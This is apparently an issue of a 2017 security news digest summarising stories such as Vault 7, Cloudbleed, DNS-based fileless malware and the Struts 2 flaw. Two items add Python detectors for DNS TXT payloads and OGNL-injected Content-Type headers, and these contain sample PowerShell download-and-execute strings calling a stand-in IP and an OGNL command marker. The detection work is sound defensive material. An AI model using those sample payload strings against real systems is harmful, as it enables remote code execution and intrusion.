Issue 15

WikiLeaks publishes Vault 7, collection of alleged CIA hacking tools

WikiLeaks has published a large set of documents describing hacking tools allegedly belonging to the CIA. So far the dump contains only documentation, not the actual malware or exploits. Their original announcement can be found here.

bleepingcomputer.com

 

Cloudbleed triggered 1.2M times, damage kept to minimum

A look at the actual impact of the Cloudbleed vulnerability: the bug was triggered about 1.2 million times, but the damage appears to have been limited.

threatpost.com

 

HackerOne offers open source projects free access to platform

HackerOne, the bug bounty platform, now offers its service free of charge to open-source projects. To be eligible, a project must be older than three months, actively maintained, and covered by an Open Source Initiative (OSI) approved license.

threatpost.com

 

New fileless malware uses DNS queries to receive PowerShell commands

Interesting new malware was discovered that uses DNS as its command-and-control (C2) channel. It establishes itself through a number of stages, fetching PowerShell scripts stored in DNS TXT records, and never writes a file to disk, which makes it hard for file-based antivirus to detect.
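Because nothing touches disk, the place to catch this is the DNS traffic itself: TXT answers that decode to PowerShell, and one host walking several TXT names under one zone in quick succession. The Python below is an added example (not the article's or the malware's code) that runs both checks over a constructed resolver log. The log format, the zone names, the stage payloads and the base64 encoding of the TXT data are all assumptions for illustration; adapt the regexes to whatever your resolver or sensor actually emits.

```python
import base64
import re
from collections import defaultdict

# Constructed stage payloads modelled on the chain described above: each TXT
# record carries base64-encoded PowerShell that resolves the next record and
# executes it. Illustrative strings only, not the real malware's code.
STAGES = [
    ("stage1.updates.example.test",
     "$s=(Resolve-DnsName -Type TXT stage2.updates.example.test).Strings;"
     "IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s)))"),
    ("stage2.updates.example.test",
     "powershell -nop -w hidden -c \"(Resolve-DnsName -Type TXT "
     "stage3.updates.example.test).Strings | IEX\""),
    ("stage3.updates.example.test",
     "Invoke-Expression ((New-Object Net.WebClient)"
     ".DownloadString('http://192.0.2.10/x'))"),
]


def _b64(text):
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


# Constructed resolver log in an assumed one-record-per-line format; the field
# names are a placeholder for whatever your resolver or sensor emits.
SAMPLE_LOG = "\n".join(
    ["2017-03-03T10:01:02Z client=10.0.0.5 qtype=A "
     "qname=www.example.test rdata=93.184.216.34"]
    + [f'2017-03-03T10:01:0{i + 5}Z client=10.0.0.5 qtype=TXT '
       f'qname={qname} rdata="{_b64(payload)}"'
       for i, (qname, payload) in enumerate(STAGES)]
    + ['2017-03-03T10:02:00Z client=10.0.0.9 qtype=TXT qname=example.test '
       'rdata="v=spf1 include:_spf.example.test -all"']
)

LOG_RE = re.compile(
    r'^(?P<ts>\S+) client=(?P<client>\S+) qtype=(?P<qtype>\S+) '
    r'qname=(?P<qname>\S+) rdata="?(?P<rdata>[^"]*)"?$'
)

# PowerShell download-and-execute vocabulary that has no business in a TXT record.
PS_INDICATORS = re.compile(
    r"Invoke-Expression|\bIEX\b|DownloadString|FromBase64String|"
    r"-EncodedCommand|-nop\b|Resolve-DnsName|nslookup",
    re.IGNORECASE,
)


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_txt(rdata):
    """Return the TXT payload as text if it is valid base64 UTF-8, else None."""
    try:
        return base64.b64decode(rdata, validate=True).decode("utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError are ValueErrors
        return None


def parent_zone(qname):
    """Strip the leftmost label: stage1.updates.example.test -> updates.example.test."""
    return ".".join(qname.split(".")[1:])


def analyze(log_text, burst_threshold=3):
    findings = []
    txt_names = defaultdict(list)  # client -> TXT names it looked up
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["qtype"] != "TXT":
            continue
        txt_names[rec["client"]].append(rec["qname"])
        decoded = decode_txt(rec["rdata"])
        if decoded is not None and PS_INDICATORS.search(decoded):
            findings.append({"rule": "powershell_in_txt", "client": rec["client"],
                             "qname": rec["qname"], "snippet": decoded[:60]})
    # Second signal: one client walking several TXT names under one zone, the
    # shape of a staged fetch even when the payload is obfuscated beyond base64.
    for client, names in txt_names.items():
        per_zone = defaultdict(set)
        for name in names:
            per_zone[parent_zone(name)].add(name)
        for zone, labels in per_zone.items():
            if len(labels) >= burst_threshold:
                findings.append({"rule": "txt_burst", "client": client,
                                 "zone": zone, "count": len(labels)})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f)
```

The content check is the high-confidence one; the burst check is there because the next sample of this family will change its encoding before it changes its fetch pattern. The legitimate SPF record in the sample log fails base64 validation and is never inspected further, which is the kind of false-positive control you want before pointing this at a busy resolver.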

thehackernews.com

 

Google Open Source Blog: Operation Rosehub

A great story of how 50 Google employees banded together to patch every open-source project on GitHub that was still vulnerable to the "Mad Gadget" vulnerability, a remote code execution bug in a widely used Java library (the Apache Commons Collections deserialization flaw) that recently hit the San Francisco Muni transit system. Over 2,600 projects received a pull request fixing the issue.

googleblog.com

 

Thou shalt not depend on me: analysing the use of outdated JavaScript libraries on the web

It is not surprising that a huge number of sites use one or more JavaScript libraries with known vulnerabilities. This article gives an overview of how bad the situation actually is.

acolyer.org

 

DHS funding new round of IoT cyber startups with total of $1M award

The Department of Homeland Security has awarded $200,000 each to five startups with promising IoT security technology, $1M in total. They will be guided through further steps to build out their proofs of concept into full products.

cyberscoop.com

 

Pentagon launches open-source experiment

The US Department of Defense has launched code.mil, a website that will host unclassified code written by the department and that is free to use for personal or public projects.

nextgov.com

 

Apple pushing two-factor authentication for iOS 10.3 users

Apple appears to be nudging users more explicitly to enable two-factor authentication (2FA) in the latest iOS version, which is currently in beta.

sophos.com

 

Apache servers under attack through easily exploitable Struts 2 flaw

Struts 2, a widely used Java web application framework, has a critical remote code execution vulnerability that is being actively exploited in the wild. Patching is advised.
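The flaw behind this item is the S2-045 advisory (CVE-2017-5638): the Jakarta multipart parser evaluates an OGNL expression smuggled into the Content-Type header, so one crafted header gives unauthenticated code execution; it is fixed in Struts 2.3.32 and 2.5.10.1. Until the patch lands, the header is worth screening at the proxy or in request logs. The Python below is an added example, not from the article or the Struts project: it parses raw HTTP requests and classifies each Content-Type with a blocklist for OGNL markers and an allowlist for what a media type should look like. The sample requests, host names and the OGNL-shaped marker string are constructed for illustration; the marker is not a working exploit.

```python
import re

# Blocklist: markers of an OGNL expression where only a media type belongs.
# Assumption: attack strings seen in the wild vary in detail, but an OGNL
# expression cannot drop its "%{" / "${" opener, so that is what we key on.
OGNL_MARKERS = re.compile(r"%\{|\$\{|ognl\.", re.IGNORECASE)

# Allowlist: a plain type/subtype with optional ;name=value parameters.
MEDIA_TYPE = re.compile(
    r'^[\w.+-]+/[\w.+-]+(?:\s*;\s*[\w.-]+=(?:"[^"]*"|[^;"\s]+))*\s*$'
)


def parse_headers(raw_request):
    """Return header name -> value (names lowercased) from a raw HTTP request."""
    headers = {}
    for line in raw_request.replace("\r\n", "\n").split("\n")[1:]:
        if not line:  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def classify_content_type(value):
    if value is None:
        return "absent"
    if OGNL_MARKERS.search(value):
        return "ognl_injection"
    if not MEDIA_TYPE.match(value):
        return "malformed"
    return "clean"


def scan_requests(raw_requests):
    """Classify each request by its Content-Type; returns (index, verdict, value)."""
    results = []
    for i, raw in enumerate(raw_requests):
        ct = parse_headers(raw).get("content-type")
        results.append((i, classify_content_type(ct), ct))
    return results


# Constructed requests, not captured traffic. The third carries an OGNL
# expression with the shape of the Struts injection attempts; it is a marker
# for the detector, not a working exploit.
SAMPLE_REQUESTS = [
    "POST /upload.action HTTP/1.1\r\nHost: app.example.test\r\n"
    "Content-Type: multipart/form-data; boundary=----FormBoundary7MA4YWx\r\n\r\n",
    "POST /api/items HTTP/1.1\r\nHost: app.example.test\r\n"
    "Content-Type: application/json; charset=utf-8\r\n\r\n",
    "POST /upload.action HTTP/1.1\r\nHost: app.example.test\r\n"
    "Content-Type: %{(#_='multipart/form-data').(#cmd='whoami')}\r\n\r\n",
    "GET /health HTTP/1.1\r\nHost: app.example.test\r\n\r\n",
    "POST /form.action HTTP/1.1\r\nHost: app.example.test\r\n"
    "Content-Type: text/plain; charset\r\n\r\n",
]

if __name__ == "__main__":
    for index, verdict, value in scan_requests(SAMPLE_REQUESTS):
        print(f"request {index}: {verdict:15} {value!r}")
```

The blocklist catches the known shape quickly; the allowlist is the check that still holds when the next variant hides the opener behind encoding the proxy does not decode. Treat "malformed" as reject-or-review rather than ignore, and keep this as a stopgap: it screens one header, while the real fix is the framework upgrade.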

helpnetsecurity.com

 

In Appreciation: Howard A. Schmidt

Howard Schmidt, who was the top cybersecurity advisor to both the Bush and Obama administrations, has passed away. Reading about what he did and what kind of person he was, he will clearly be missed.

darkreading.com